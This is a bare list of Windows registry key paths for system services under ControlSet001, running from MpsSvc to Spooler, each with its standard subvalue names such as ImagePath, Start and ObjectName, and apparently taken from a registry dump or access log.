HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ose64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\osppsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PerfHost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcLocator\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SamSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SDRSVC\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SNMPTRAP\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ImagePath 